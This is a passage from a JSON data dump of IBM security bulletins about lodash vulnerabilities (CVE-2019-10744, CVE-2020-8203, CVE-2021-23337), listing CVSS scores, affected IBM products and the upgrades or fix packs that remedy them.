"A6BB7DA66FC718A2182210DB01ECE231562B4B2F7BADC0F1E4C08E483DC7FCF2", "href": "https://www.ibm.com/support/pages/node/1274908", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2023-02-24T01:38:06", "description": "## Summary\n\nA Security Vulnerability affects IBM Cloud Private - lodash\n\n## Vulnerability Details\n\n**CVEID: **[CVE-2019-10744](<https://vulners.com/cve/CVE-2019-10744>) \n**DESCRIPTION: **Versions of lodash lower than 4.17.12 are vulnerable to Prototype Pollution. The function defaultsDeep could be tricked into adding or modifying properties of Object.prototype using a constructor payload. \nCVSS Base score: 6.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/167415](<https://exchange.xforce.ibmcloud.com/vulnerabilities/167415>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L)\n\n## Affected Products and Versions\n\nAffected Product(s) | Version(s) \n---|--- \nIBM Cloud Private | 3.2.1 CD \nIBM Cloud Private | 3.2.0 CD \n \n## Remediation/Fixes\n\nProduct defect fixes and security updates are only available for the two most recent Continuous Delivery (CD) update packages \n\n * IBM Cloud Private 3.2.0\n * IBM Cloud Private 3.2.1\n\nFor IBM Cloud Private 3.2.0, apply January fix pack:\n\n * [IBM Cloud Private 3.2.0.2001 fix pack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/WebSphere/IBM+Cloud+Private&release=All&platform=All&function=fixId&fixids=icp-3.2.0.2001-build539802-34753&includeSupersedes=0>)\n\nFor IBM Cloud Private 3.2.1, apply January fix pack:\n\n * [IBM Cloud Private 3.2.1.2001 fix pack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/WebSphere/IBM+Cloud+Private&release=All&platform=All&function=fixId&fixids=icp-3.2.1.2001-build539803-34755&includeSupersedes=0> \"IBM Cloud Private 3.2.1.1911 fix pack\" )\n\nFor IBM Cloud Private 3.1.0, 3.1.1, 3.1.2: \n\n * Upgrade to the latest Continuous Delivery (CD) update package, IBM Cloud Private 3.2.1. \n * If required, individual product fixes can be made available between CD update packages for resolution of problems. Contact IBM support for assistance\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2020-02-18T20:19:59", "type": "ibm", "title": "Security Bulletin: A Security Vulnerability affects IBM Cloud Private - lodash (CVE-2019-10744)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10744"], "modified": "2020-02-18T20:19:59", "id": "6128A13C04F8ECEA7D864C9BB4042D04376F9E25186BB47D9F6B544820BE25EE", "href": "https://www.ibm.com/support/pages/node/1164388", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2023-02-24T01:39:59", "description": "## Summary\n\nIBM Cloud Transformation Advisor has addressed the following vulnerability. Node.js lodash module (CVE-2019-10744)\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2019-10744](<https://vulners.com/cve/CVE-2019-10744>) \n** DESCRIPTION: **Versions of lodash lower than 4.17.12 are vulnerable to Prototype Pollution. The function defaultsDeep could be tricked into adding or modifying properties of Object.prototype using a constructor payload. \nCVSS Base score: 6.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/167415](<https://exchange.xforce.ibmcloud.com/vulnerabilities/167415>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Cloud Transformation Advisor| 2.0.1 \n \n\n\n## Remediation/Fixes\n\nUpgrade to 2.0.2 or later.\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2019-12-17T14:51:47", "type": "ibm", "title": "Security Bulletin: IBM Cloud Transformation Advisor is affected by a Node.js by Prototype Pollution vulnerabiliy", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10744"], "modified": "2019-12-17T14:51:47", "id": "E9CE56A0D3AED40D70C6118F6F1140DE3C104D09576AFA0D3225D5F8AF840D26", "href": "https://www.ibm.com/support/pages/node/1137472", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2023-02-27T17:46:48", "description": "## Summary\n\nThere is a possible denial of service vulnerability in some of the Watson Knowledge Catalog for IBM Cloud Pak for Data UI services. This vulnerability has been addressed.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2019-10744](<https://vulners.com/cve/CVE-2019-10744>) \n** DESCRIPTION: **Node.js lodash module is vulnerable to a denial of service, caused by a prototype pollution flaw. By sending a specially-crafted request using a constructor payload, a remote attacker could exploit this vulnerability to inject properties onto Object.prototype to cause a denial of service condition. \nCVSS Base score: 6.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/167415](<https://exchange.xforce.ibmcloud.com/vulnerabilities/167415>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Watson Knowledge Catalog on-prem| 2.0 \nIBM Cloud Pak for Data| 2.5 \n \n \n\n\n## Remediation/Fixes\n\nInstall wkc-patch-3.0.0.4 for IBM Cloud Pak for Data. \n\nContact IBM support for more details.\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2020-04-01T00:36:03", "type": "ibm", "title": "Security Bulletin: Possible denial of service vulnerability in Watson Knowledge Catalog for IBM Cloud Pak for Data", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10744"], "modified": "2020-04-01T00:36:03", "id": "3B5AA55C19B7A3B2E56D553A91DED976FF216D3E05DBF0D4AE695FCDF38AA2D2", "href": "https://www.ibm.com/support/pages/node/6148107", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2023-02-28T01:46:48", "description": "## Summary\n\nSecurity Bulletin: IBM Robotic Process Automation is vulnerable to a denial of service through node.js lodash\n\n## Vulnerability Details\n\n**CVEID: **[CVE-2019-10744](<https://vulners.com/cve/CVE-2019-10744>) \n**DESCRIPTION: **Node.js lodash module is vulnerable to a denial of service, caused by a prototype pollution flaw. By sending a specially-crafted request using a constructor payload, a remote attacker could exploit this vulnerability to inject properties onto Object.prototype to cause a denial of service condition. \nCVSS Base score: 6.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/167415](<https://exchange.xforce.ibmcloud.com/vulnerabilities/167415>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L)\n\n## Affected Products and Versions\n\nAffected Product(s) | Version(s) \n---|--- \nIBM Robotic Process Automation | &lt; 21.0.1 \n \n## Remediation/Fixes\n\nAffected Product(s) | Version(s) | Remediated Versions \n---|---|--- \nIBM Robotic Process Automation | &lt; 21.0.1 | 21.0.1 \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2022-05-04T19:28:38", "type": "ibm", "title": "Security Bulletin: IBM Robotic Process Automation is vulnerable to a denial of service through node.js lodash", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10744"], "modified": "2022-05-04T19:28:38", "id": "BAAF8EAD73C367A58A25800EF35FD2E3A4671B1EB487F502B95D9555A1D90CCE", "href": "https://www.ibm.com/support/pages/node/6573909", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2023-02-27T21:54:30", "description": "## Summary\n\nIBM Integration Bus &amp; IBM App Connect Enterprise V11 ship with Node.js for which vulnerabilities were reported and have been addressed. Vulnerability details are listed below.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2019-10744](<https://vulners.com/cve/CVE-2019-10744>) \n** DESCRIPTION: **Node.js lodash module is vulnerable to a denial of service, caused by a prototype pollution flaw. By sending a specially-crafted request using a constructor payload, a remote attacker could exploit this vulnerability to inject properties onto Object.prototype to cause a denial of service condition. \nCVSS Base score: 6.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/167415](<https://exchange.xforce.ibmcloud.com/vulnerabilities/167415>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L)\n\n## Affected Products and Versions\n\nIBM Integration Bus V10.0.0 - V10.0.0.20\n\nIBM App connect Enterprise V11 , V11.0.0.0 - V11.0.0.5\n\n \n\n\n## Remediation/Fixes\n\n**Product**\n\n| \n\n**VRMF**\n\n| APAR| \n\n**Remediation / Fix** \n \n---|---|---|--- \nIBM App Connect| V11.0.0.0-V11.0.0.5| IT32885 | \n\nThe APAR is available in fix pack 11.0.0.6\n\n[IBM App Connect Enterprise Version V11-Fix Pack 11.0.0.6](<https://www.ibm.com/support/pages/node/1073750> \"IBM App Connect Enterprise Version V11-Fix Pack 11.0.0.6\" ) \n \nIBM Integration Bus| V10.0.0.0 - V10.0.0.20| IT32885 | \n\nThe APAR is available in fix pack 10.0.0.21\n\n[IBM Integration Bus V10.0 - Fix Pack 10.0.0.21](<https://www.ibm.com/support/pages/node/6232482> \"IBM Integration Bus V10.0 - Fix Pack 10.0.0.21\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2020-06-25T14:00:47", "type": "ibm", "title": "Security Bulletin: A security vulnerability in Node.js affects IBM Integration Bus & IBM App Connect Enterprise V11 (CVE-2019-10744)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10744"], "modified": "2020-06-25T14:00:47", "id": "F44B378FA4B9E4A8D4D61DB7AA1CF1B912D25AF8276D0BD1E6E86ED3C7B5BC7B", "href": "https://www.ibm.com/support/pages/node/6238872", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2023-02-24T01:35:14", "description": "## Summary\n\nNode.js lodash denial of service vulnerability affects IBM Spectrum Control (formerly Tivoli Storage Productivity Center).\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2019-10744](<https://vulners.com/cve/CVE-2019-10744>) \n** DESCRIPTION: **Versions of lodash lower than 4.17.12 are vulnerable to Prototype Pollution. The function defaultsDeep could be tricked into adding or modifying properties of Object.prototype using a constructor payload. \nCVSS Base score: 6.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/167415](<https://exchange.xforce.ibmcloud.com/vulnerabilities/167415>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nSpectrum Control| 5.3.0 - 5.3.4 \n \n\n\n## Remediation/Fixes\n\nThe solution is to apply an appropriate IBM Spectrum Control fix. Click on the download link and follow the Installation Instructions. The solution should be implemented as soon as practicable. \n\nStarting with 5.2.8, Tivoli Storage Productivity Center has been renamed to IBM Spectrum Control.\n\nRelease| First Fixing \nVRM Level| Link to Fix/Fix Availability Target \n---|---|--- \n5.3| 5.3.5| <http://www.ibm.com/support/docview.wss?uid=swg21320822#53_0> \n \n**Note:** It is always recommended to have a current backup before applying any update procedure.\n\n## Workarounds and Mitigations\n\nThe solution is to apply an appropriate IBM Spectrum Control fix. Click on the download link and follow the Installation Instructions. The solution should be implemented as soon as practicable. \n\nStarting with 5.2.8, Tivoli Storage Productivity Center has been renamed to IBM Spectrum Control. \n\nRelease| First Fixing \nVRM Level| Link to Fix/Fix Availability Target \n---|---|--- \n5.3| 5.3.5| <http://www.ibm.com/support/docview.wss?uid=swg21320822#53_0> \n \n**Note:** It is always recommended to have a current backup before applying any update procedure.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2022-02-22T20:10:14", "type": "ibm", "title": "Security Bulletin: Node.js lodash vulnerability affects IBM Spectrum Control (formerly Tivoli Storage Productivity Center) ( CVE-2019-10744)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10744"], "modified": "2022-02-22T20:10:14", "id": "0602C49DA7AFD86456463E6424B1565996BFB3A4334A3E509D18B4E1454C702A", "href": "https://www.ibm.com/support/pages/node/1104753", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2023-02-27T21:50:21", "description": "## Summary\n\nSecurity Vulnerabilities affect IBM Cloud Pak for Data - Node.js (CVE-2020-8203)\n\n## Vulnerability Details\n\n** Third Party Entry: **183560 \n** DESCRIPTION: **Node.js lodash module denial of service \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [https://exchange.xforce.ibmcloud.com/vulnerabilities/183560 ](<https://exchange.xforce.ibmcloud.com/vulnerabilities/183560>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nCP4D| 2.5 \nCP4D| 3.0 \n \n\n\n## Remediation/Fixes\n\n * Patch: \n<https://www.ibm.com/support/pages/node/6327429>\n * Users of IBM Cloud Pak for Data V2.5 are advised to: \nApply IBM Cloud Pak for Data V2.5 cpd-2.5.0.0-lite-patch-6\n\n * Users of IBM Cloud Pak for Data V3.0.0 and V3.0.1 are advised to: \nApply IBM Cloud Pak for Data V3.0.1 cpd-3.0.1-lite-patch-5\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.4, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2020-10-01T21:23:31", "type": "ibm", "title": "Security Bulletin: Security Vulnerabilities affect IBM Cloud Pak for Data - Node.js (CVE-2020-8203)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8203"], "modified": "2020-10-01T21:23:31", "id": "2845AD6FAC4EA95B559A4E380E9C11A324976019B59ABF05F3BD5C0D71A9860E", "href": "https://www.ibm.com/support/pages/node/6340291", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2023-02-27T21:48:03", "description": "## Summary\n\nThere is a vulnerability in JavaScript library (Lodash) that is used by IBM License Metric Tool.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2020-8203](<https://vulners.com/cve/CVE-2020-8203>) \n** DESCRIPTION: **Node.js lodash module is vulnerable to a denial of service, caused by a prototype pollution attack. A remote attacker could exploit this vulnerability using the merge, mergeWith, and defaultsDeep functions to inject properties onto Object.prototype to crash the server and possibly execute arbitrary code on the system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/183560](<https://exchange.xforce.ibmcloud.com/vulnerabilities/183560>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM License Metric Tool| All \n \n \n \n\n\n \n\n\n## Remediation/Fixes\n\nUpgrade to version 9.2.22 or later using the following procedure: \n\nIn BigFix console, expand IBM License Reporting (ILMT) node under Sites node in the tree panel. \nClick Fixlets and Tasks node. Fixlets and Tasks panel will be displayed on the right. \nIn the Fixlets and Tasks panel locate Upgrade to the latest version of IBM License Metric Tool 9.x fixlet and run it against the computer that hosts your server.\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.4, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2020-12-16T08:03:38", "type": "ibm", "title": "Security Bulletin: A vulnerability in JavaScript affects IBM License Metric Tool v9 (CVE-2020-8203).", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8203"], "modified": "2020-12-16T08:03:38", "id": "DFB4A9585ACCD058A33E7C0B787D6C7AD3CF5F7FAE137EEC5A2BC75C501CD55E", "href": "https://www.ibm.com/support/pages/node/6382856", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2023-02-28T01:44:28", "description": "## Summary\n\nPrototype pollution attack when using _.zipObjectDeep in lodash before 4.17.20.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2020-8203](<https://vulners.com/cve/CVE-2020-8203>) \n** DESCRIPTION: **Node.js lodash module is vulnerable to a denial of service, caused by a prototype pollution attack. A remote attacker could exploit this vulnerability using the merge, mergeWith, and defaultsDeep functions to inject properties onto Object.prototype to crash the server and possibly execute arbitrary code on the system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/183560](<https://exchange.xforce.ibmcloud.com/vulnerabilities/183560>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nUCV - UrbanCode Velocity| All \n \n\n\n## Remediation/Fixes\n\nupgrade to 2.4.0 or later\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.4, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2022-07-08T19:00:44", "type": "ibm", "title": "Security Bulletin: CVE-2020-8203", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8203"], "modified": "2022-07-08T19:00:44", "id": "D8A776D3B0AC34F7E1A0CD9930DE0D129047F912F17BAA37C912C1C104FBA268", "href": "https://www.ibm.com/support/pages/node/6602301", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2023-02-28T01:44:29", "description": "## Summary\n\nNode.js lodash module is vulnerable to a denial of service, caused by a prototype pollution attack. A remote attacker could exploit this vulnerability using the merge, mergeWith, and defaultsDeep functions to inject properties onto Object.prototype to crash the server and possibly execute arbitrary code on the system.\n\n## Vulnerability Details\n\n** Third Party Entry: **183560 \n** DESCRIPTION: **Node.js lodash module is vulnerable to a denial of service, caused by a prototype pollution attack. A remote attacker could exploit this vulnerability using the merge, mergeWith, and defaultsDeep functions to inject properties onto Object.prototype to crash the server and possibly execute arbitrary code on the system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [https://exchange.xforce.ibmcloud.com/vulnerabilities/183560 ](<https://exchange.xforce.ibmcloud.com/vulnerabilities/183560>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nUCV - UrbanCode Velocity| All \n \n\n\n## Remediation/Fixes\n\nupgrade to 2.4.0 or later\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {}, "published": "2022-07-08T18:57:45", "type": "ibm", "title": "Security Bulletin: CVE-2020-8203", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2020-8203"], "modified": "2022-07-08T18:57:45", "id": "643E846D7944EB8AF4DC6AA049F3D7CEA565A47905FF0E8DC5627CB212EA131D", "href": "https://www.ibm.com/support/pages/node/6602299", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-02-28T01:56:13", "description": "## Summary\n\nIBM Cloud Transformation Advisor has addressed Node.js vulnerability CVE-2021-23337\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-23337](<https://vulners.com/cve/CVE-2021-23337>) \n** DESCRIPTION: **Node.js lodash module could allow a remote authenticated attacker to execute arbitrary commands on the system, caused by a command injection flaw in the template. By sending a specially-crafted request, an attacker could exploit this vulnerability to execute arbitrary commands on the system. \nCVSS Base score: 7.2 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/196797](<https://exchange.xforce.ibmcloud.com/vulnerabilities/196797>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Cloud Transformation Advisor| 2.4.2, 2.4.3 \n \n\n\n## Remediation/Fixes\n\nUpgrade to 2.4.4 or later. \n\nIBM Cloud Transformation Advisor can be installed from OperatorHub page in Red Hat OpenShift Container Platform or locally following this [link](<https://www.ibm.com/cloud/architecture/tutorials/install-ibm-transformation-advisor-local> \"link\" ).\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-22T15:56:46", "type": "ibm", "title": "Security Bulletin: IBM Cloud Transformation Advisor is affected by Node.js vulnerability", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": 